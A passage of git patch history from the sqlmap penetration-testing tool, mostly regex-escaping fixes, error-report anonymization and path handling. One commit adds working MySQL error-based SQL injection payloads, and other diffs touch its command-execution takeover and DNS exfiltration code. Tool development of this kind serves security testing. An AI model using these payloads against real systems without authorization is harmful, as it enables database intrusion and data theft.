                 for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
                     port, request = match.groups()
                     request = request.decode("base64")
-                    _ = re.search(r"%s:.+" % HTTP_HEADER.HOST, request)
+                    _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
                     if _:
                         host = _.group(0).strip()
                         if not re.search(r":\d+\Z", host):
diff --git a/lib/parse/banner.py b/lib/parse/banner.py
index 293994ce4..2e11cb10c 100644
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -63,7 +63,7 @@ class MSSQLBannerHandler(ContentHandler):
     def endElement(self, name):
         if name == "signature":
             for version in (self._version, self._versionAlt):
-                if version and re.search(r" %s[\.\ ]+" % version, self._banner):
+                if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
                     self._feedInfo("dbmsRelease", self._release)
                     self._feedInfo("dbmsVersion", self._version)
                     self._feedInfo("dbmsServicePack", self._servicePack)
diff --git a/lib/request/connect.py b/lib/request/connect.py
index bfb8bf242..bafa164ab 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -752,14 +752,14 @@ class Connect(object):
         if conf.csrfToken:
             def _adjustParameter(paramString, parameter, newValue):
                 retVal = paramString
-                match = re.search("%s=(?P<value>[^&]*)" % parameter, paramString)
+                match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString)
                 if match:
                     origValue = match.group("value")
-                    retVal = re.sub("%s=[^&]*" % parameter, "%s=%s" % (parameter, newValue), paramString)
+                    retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString)
                 return retVal
 
             page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
-            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % conf.csrfToken, page or "")
+            match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
             token = (match.group(2) or match.group(3) or match.group(4)) if match else None
 
             if not token:
@@ -802,10 +802,10 @@ class Connect(object):
         if conf.rParam:
             def _randomizeParameter(paramString, randomParameter):
                 retVal = paramString
-                match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)
+                match = re.search("%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
                 if match:
                     origValue = match.group("value")
-                    retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
+                    retVal = re.sub("%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
                 return retVal
 
             for randomParameter in conf.rParam:
@@ -847,7 +847,7 @@ class Connect(object):
                         found = False
                         value = unicode(value)
 
-                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), name, re.escape(delimiter))
+                        regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
                         if re.search(regex, (get or "")):
                             found = True
                             get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
diff --git a/lib/utils/pivotdumptable.py b/lib/utils/pivotdumptable.py
index 6cf9c2275..8adaccf1c 100644
--- a/lib/utils/pivotdumptable.py
+++ b/lib/utils/pivotdumptable.py
@@ -64,7 +64,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
     colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT))
 
     if conf.pivotColumn:
-        if any(re.search(r"(.+\.)?%s" % conf.pivotColumn, _, re.I) for _ in colList):
+        if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList):
             infoMsg = "using column '%s' as a pivot " % conf.pivotColumn
             infoMsg += "for retrieving row data"
             logger.info(infoMsg)
@@ -173,7 +173,7 @@ def whereQuery(query):
         prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "")
 
         if "%s)" % conf.tbl.upper() in prefix.upper():
-            prefix = re.sub(r"(?i)%s\)" % conf.tbl, "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
+            prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix)
         elif re.search(r"(?i)\bWHERE\b", prefix):
             prefix += " AND %s" % conf.dumpWhere
         else:
diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py
index 4a5ca7d94..b06306d65 100644
--- a/plugins/generic/entries.py
+++ b/plugins/generic/entries.py
@@ -147,7 +147,7 @@ class Entries:
                 for column in colList:
                     _ = agent.preprocessField(tbl, column)
                     if _ != column:
-                        colString = re.sub(r"\b%s\b" % column, _, colString)
+                        colString = re.sub(r"\b%s\b" % re.escape(column), _, colString)
 
                 entriesCount = 0
 

From 725c3a6a95a1fb49d92be6ccaf74d135f66dc91c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 14:08:06 +0100
Subject: [PATCH 096/492] Minor update

---
 lib/core/common.py | 13 ++++++-------
 sqlmap.py          |  7 +++++++
 2 files changed, 13 insertions(+), 7 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 87b7da4bf..0249f69d0 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2855,16 +2855,15 @@ def createGithubIssue(errMsg, excMsg):
     msg = "\ndo you want to automatically create a new (anonymized) issue "
     msg += "with the unhandled exception information at "
     msg += "the official Github repository? [y/N] "
-    test = readInput(msg, default="N")
-    if test[0] in ("y", "Y"):
+    try:
+        test = readInput(msg, default="N")
+    except:
+        test = None
+
+    if test and test[0] in ("y", "Y"):
         ex = None
         errMsg = errMsg[errMsg.find("\n"):]
 
-        for match in re.finditer(r'File "(.+?)", line', excMsg):
-            file = match.group(1).replace('\\', "/")
-            file = file[file.find("sqlmap"):].replace("sqlmap/", "", 1)
-            excMsg = excMsg.replace(match.group(1), file)
-
         data = {"title": "Unhandled exception (#%s)" % hashlib.md5(excMsg).hexdigest()[:8], "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
         req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
 
diff --git a/sqlmap.py b/sqlmap.py
index 87035781a..066c7709a 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -9,6 +9,7 @@ import bdb
 import inspect
 import logging
 import os
+import re
 import sys
 import time
 import traceback
@@ -129,6 +130,12 @@ def main():
         print
         errMsg = unhandledExceptionMessage()
         excMsg = traceback.format_exc()
+
+        for match in re.finditer(r'File "(.+?)", line', excMsg):
+            file = match.group(1).replace('\\', "/")
+            file = file[file.find("sqlmap"):].replace("sqlmap/", "", 1)
+            excMsg = excMsg.replace(match.group(1), file)
+
         logger.critical(errMsg)
         kb.stickyLevel = logging.CRITICAL
         dataToStdout(excMsg)

From df73be32f1a1d810d6ce241d17db3103aa2a43f2 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 14:41:21 +0100
Subject: [PATCH 097/492] Fix for an Issue #876

---
 lib/request/connect.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index bafa164ab..a0ed7d6ff 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -767,10 +767,10 @@ class Connect(object):
                     if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
                         token = page
 
-                if not token and any(cookie.name == conf.csrfToken for cookie in conf.cj):
-                    for cookie in conf.cj:
-                        if cookie.name == conf.csrfToken:
-                            token = cookie.value
+                if not token and any(_.name == conf.csrfToken for _ in conf.cj):
+                    for _ in conf.cj:
+                        if _.name == conf.csrfToken:
+                            token = _.value
                             if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))):
                                 if post:
                                     post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token)

From 258a700b2e1211baf360614a315075cf80c40836 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 15:14:41 +0100
Subject: [PATCH 098/492] More anonymization of unhandled exception messages

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 0249f69d0..14690a0b2 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2841,7 +2841,7 @@ def unhandledExceptionMessage():
     errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
     errMsg += "Python version: %s\n" % PYVERSION
     errMsg += "Operating system: %s\n" % PLATFORM
-    errMsg += "Command line: %s\n" % " ".join(sys.argv)
+    errMsg += "Command line: %s\n" % re.sub(".+?sqlmap.py", "sqlmap.py", " ".join(sys.argv))
     errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
     errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
 

From 9af6d497dcd5efa7fd31c7fc13daabce3fd59e2d Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 15:22:54 +0100
Subject: [PATCH 099/492] Minor bug fix

---
 sqlmap.py | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/sqlmap.py b/sqlmap.py
index 066c7709a..059c7c2ad 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -132,9 +132,10 @@ def main():
         excMsg = traceback.format_exc()
 
         for match in re.finditer(r'File "(.+?)", line', excMsg):
-            file = match.group(1).replace('\\', "/")
-            file = file[file.find("sqlmap"):].replace("sqlmap/", "", 1)
-            excMsg = excMsg.replace(match.group(1), file)
+            file_ = match.group(1).replace('\\', "/")
+            file_ = file_[file_.find("sqlmap"):] if "sqlmap" in file_ else file_
+            file_ = file_.replace("sqlmap/", "", 1)
+            excMsg = excMsg.replace(match.group(1), file_)
 
         logger.critical(errMsg)
         kb.stickyLevel = logging.CRITICAL

From 455ea9922c06de0a2134f155e28dac36afbad0be Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 15:26:28 +0100
Subject: [PATCH 100/492] Minor update

---
 lib/core/common.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 14690a0b2..636703505 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -2841,7 +2841,7 @@ def unhandledExceptionMessage():
     errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
     errMsg += "Python version: %s\n" % PYVERSION
     errMsg += "Operating system: %s\n" % PLATFORM
-    errMsg += "Command line: %s\n" % re.sub(".+?sqlmap.py", "sqlmap.py", " ".join(sys.argv))
+    errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
     errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
     errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
 

From 67279a1136fca722134972f57545760c6cb26401 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 15:30:05 +0100
Subject: [PATCH 101/492] Minor update

---
 sqlmap.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/sqlmap.py b/sqlmap.py
index 059c7c2ad..4d3bfb213 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -134,7 +134,7 @@ def main():
         for match in re.finditer(r'File "(.+?)", line', excMsg):
             file_ = match.group(1).replace('\\', "/")
             file_ = file_[file_.find("sqlmap"):] if "sqlmap" in file_ else file_
-            file_ = file_.replace("sqlmap/", "", 1)
+            file_ = re.sub(r"(?i)sqlmap[^/]*/", "", file_, 1)
             excMsg = excMsg.replace(match.group(1), file_)
 
         logger.critical(errMsg)

From 8ea22c512464b5ca7253d60808091ae93af29a14 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 28 Oct 2014 15:34:53 +0100
Subject: [PATCH 102/492] Fix for an Issue #878

---
 lib/utils/google.py | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/lib/utils/google.py b/lib/utils/google.py
index e675aa1af..5da738dc6 100644
--- a/lib/utils/google.py
+++ b/lib/utils/google.py
@@ -46,10 +46,8 @@ class Google(object):
         try:
             conn = self.opener.open("http://www.google.com/ncr")
             conn.info()  # retrieve session cookie
-        except urllib2.HTTPError, e:
-            e.info()
-        except urllib2.URLError:
-            errMsg = "unable to connect to Google"
+        except Exception, ex:
+            errMsg = "unable to connect to Google ('%s')" % ex
             raise SqlmapConnectionException(errMsg)
 
     def search(self, dork):

From b7aeb670e1ebe227cb28671f93756f88e7aa5468 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 29 Oct 2014 10:14:01 +0100
Subject: [PATCH 103/492] Implementation of a new MySQL error-based payload
 (found at RDot)

---
 xml/payloads.xml | 80 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 80 insertions(+)

diff --git a/xml/payloads.xml b/xml/payloads.xml
index 8367359bf..97d92fbf2 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1252,6 +1252,26 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>4</level>
+        <risk>0</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 4.1 AND error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
@@ -1470,6 +1490,26 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>2</risk>
+        <clause>1</clause>
+        <where>1</where>
+        <vector>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>MySQL &gt;= 4.1 OR error-based - WHERE or HAVING clause</title>
         <stype>2</stype>
@@ -1715,6 +1755,26 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>1,2,3</clause>
+        <where>3</where>
+        <vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>PostgreSQL error-based - Parameter replace</title>
         <stype>2</stype>
@@ -1877,6 +1937,26 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>MySQL &gt;= 5.5 error-based - GROUP BY and ORDER BY clauses (BIGINT UNSIGNED)</title>
+        <stype>2</stype>
+        <level>5</level>
+        <risk>0</risk>
+        <clause>2,3</clause>
+        <where>1</where>
+        <vector>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
+        <request>
+            <payload>,(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>
+        </request>
+        <response>
+            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
+        </response>
+        <details>
+            <dbms>MySQL</dbms>
+            <dbms_version>&gt;= 5.5</dbms_version>
+        </details>
+    </test>
+
     <test>
         <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
         <stype>2</stype>

From 5b0d74146e917290abe5ff79bdad9571b6747d5e Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 01:01:35 +0100
Subject: [PATCH 104/492] Fix for an Issue #883

---
 lib/parse/cmdline.py | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 06eccdd9c..c914a3d27 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -860,6 +860,9 @@ def cmdLineParser():
 
         try:
             (args, _) = parser.parse_args(argv)
+        except UnicodeEncodeError, ex:
+            print "\n[!] %s" % ex.object.encode("unicode-escape")
+            raise SystemExit
         except SystemExit:
             if "-h" in argv and not advancedHelp:
                 print "\n[!] to see full list of options run with '-hh'"

From 0feb379b47e7d19a0aa9574be445ef528e15ae3c Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 16:39:29 +0100
Subject: [PATCH 105/492] Fix for an Issue #887

---
 lib/takeover/xp_cmdshell.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index b1dbf3388..706863ca0 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -228,7 +228,7 @@ class Xp_cmdshell:
 
             if output and isListLike(output) and len(output) > 1:
                 _ = ""
-                lines = [_ for _ in flattenValue(output) if _ is not None]
+                lines = [line for line in flattenValue(output) if line is not None]
 
                 for i in xrange(len(lines)):
                     line = lines[i] or ""

From 38978c3e549661b5057cc1a9b1c0a3f514fcac87 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 16:45:26 +0100
Subject: [PATCH 106/492] Fix for an Issue #884

---
 lib/core/common.py | 2 +-
 lib/utils/hash.py  | 2 ++
 2 files changed, 3 insertions(+), 1 deletion(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 636703505..6d69fbfd7 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -989,7 +989,7 @@ def checkFile(filename):
     Checks for file existence
     """
 
-    if not os.path.isfile(filename):
+    if filename is None or not os.path.isfile(filename):
         raise SqlmapFilePathException("unable to read file '%s'" % filename)
 
 def banner():
diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index 0c76bff5b..e414e7239 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -750,6 +750,8 @@ def dictionaryAttack(attack_dict):
                     else:
                         logger.info("using default dictionary")
 
+                    dictPaths = filter(None, dictPaths)
+
                     for dictPath in dictPaths:
                         checkFile(dictPath)
 

From 4de4f5c1babc5250ec8d72e5e8f3fdab5788cb66 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 16:59:31 +0100
Subject: [PATCH 107/492] Minor style fix

---
 sqlmap.py | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/sqlmap.py b/sqlmap.py
index 4d3bfb213..3472b17a8 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -132,9 +132,10 @@ def main():
         excMsg = traceback.format_exc()
 
         for match in re.finditer(r'File "(.+?)", line', excMsg):
-            file_ = match.group(1).replace('\\', "/")
-            file_ = file_[file_.find("sqlmap"):] if "sqlmap" in file_ else file_
-            file_ = re.sub(r"(?i)sqlmap[^/]*/", "", file_, 1)
+            file_ = match.group(1)
+            file_ = os.path.relpath(file_, os.path.dirname(__file__))
+            file_ = file_.replace("\\", '/')
+            file_ = re.sub(r"\.\./", '/', file_).lstrip('/')
             excMsg = excMsg.replace(match.group(1), file_)
 
         logger.critical(errMsg)

From c33e493e0dc1969931468a3b38fd4008608cd5cd Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 17:06:09 +0100
Subject: [PATCH 108/492] Fix for an Issue #885

---
 lib/takeover/udf.py | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index df0453d19..c1e508b79 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -8,6 +8,7 @@ See the file 'doc/COPYING' for copying permission
 import os
 
 from lib.core.agent import agent
+from lib.core.common import checkFile
 from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import isStackingAvailable
@@ -146,6 +147,7 @@ class UDF:
 
         if len(self.udfToCreate) > 0:
             self.udfSetRemotePath()
+            checkFile(self.udfLocalFile)
             written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, "binary", forceCheck=True)
 
             if written is not True:

From 65c3dfd6513c6caf352dd12cd92dec2d1b0c1fee Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 18:40:11 +0100
Subject: [PATCH 109/492] Bug fix (proper path joining)

---
 plugins/dbms/mysql/takeover.py      | 4 ++--
 plugins/dbms/postgresql/takeover.py | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py
index e6e79e3db..4457c9493 100644
--- a/plugins/dbms/mysql/takeover.py
+++ b/plugins/dbms/mysql/takeover.py
@@ -78,10 +78,10 @@ class Takeover(GenericTakeover):
         self.udfSharedLibName = "libs%s" % randomStr(lowercase=True)
 
         if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile += "/mysql/windows/%d/lib_mysqludf_sys.dll" % Backend.getArch()
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "windows", "%d" % Backend.getArch(), "lib_mysqludf_sys.dll")
             self.udfSharedLibExt = "dll"
         else:
-            self.udfLocalFile += "/mysql/linux/%d/lib_mysqludf_sys.so" % Backend.getArch()
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "mysql", "linux", "%d" % Backend.getArch(), "lib_mysqludf_sys.so")
             self.udfSharedLibExt = "so"
 
     def udfCreateFromSharedLib(self, udf, inpRet):
diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py
index b310c43cd..0c3a41584 100644
--- a/plugins/dbms/postgresql/takeover.py
+++ b/plugins/dbms/postgresql/takeover.py
@@ -58,10 +58,10 @@ class Takeover(GenericTakeover):
             raise SqlmapUnsupportedFeatureException(errMsg)
 
         if Backend.isOs(OS.WINDOWS):
-            self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer)
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll")
             self.udfSharedLibExt = "dll"
         else:
-            self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer)
+            self.udfLocalFile = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so")
             self.udfSharedLibExt = "so"
 
     def udfCreateFromSharedLib(self, udf, inpRet):

From ab269f315f8c1bc440bd74bb7685d90d4756bade Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 18:58:30 +0100
Subject: [PATCH 110/492] Fix for an Issue #886

---
 lib/parse/cmdline.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index c914a3d27..0bfbbba77 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -41,7 +41,7 @@ def cmdLineParser():
 
     checkSystemEncoding()
 
-    _ = os.path.normpath(sys.argv[0])
+    _ = getUnicode(os.path.normpath(sys.argv[0]), system=True)
 
     usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
             "\"%s\"" % _ if " " in _ else _)

From 49d3860b1fa7f3df20bbdc573f6d5c061257fae9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 20:22:15 +0100
Subject: [PATCH 111/492] Minor fix

---
 lib/request/connect.py | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index a0ed7d6ff..ded020cb0 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -273,7 +273,6 @@ class Connect(object):
                     url, params = url.split('?', 1)
                     params = urlencode(params)
                     url = "%s?%s" % (url, params)
-                    requestMsg += "?%s" % params
 
             elif multipart:
                 # Needed in this form because of potential circle dependency

From 4e0e64d06bbd7c66506c2d2bfeb854c8a546fb4f Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 31 Oct 2014 20:28:37 +0100
Subject: [PATCH 112/492] Bug fix for DNS Exfiltration in PgSQL case ('invalid
 URI')

---
 lib/core/agent.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/agent.py b/lib/core/agent.py
index 2d6146c3b..9a33194bb 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -993,7 +993,7 @@ class Agent(object):
         """
 
         _ = re.escape(PAYLOAD_DELIMITER)
-        return re.sub("(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
+        return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
 
     def runAsDBMSUser(self, query):
         if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:

From baf9ada28dadb93af8c1e9ddac52a68fb85d91fc Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 1 Nov 2014 17:13:33 +0100
Subject: [PATCH 113/492] Fix for an Issue #889

---
 lib/parse/sitemap.py | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/lib/parse/sitemap.py b/lib/parse/sitemap.py
index 16aaf1e47..799f62a92 100644
--- a/lib/parse/sitemap.py
+++ b/lib/parse/sitemap.py
@@ -5,11 +5,13 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import httplib
 import re
 
 from lib.core.common import readInput
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.exception import SqlmapSyntaxException
 from lib.request.connect import Connect as Request
 from thirdparty.oset.pyoset import oset
 
@@ -26,8 +28,13 @@ def parseSitemap(url, retVal=None):
             abortedFlag = False
             retVal = oset()
 
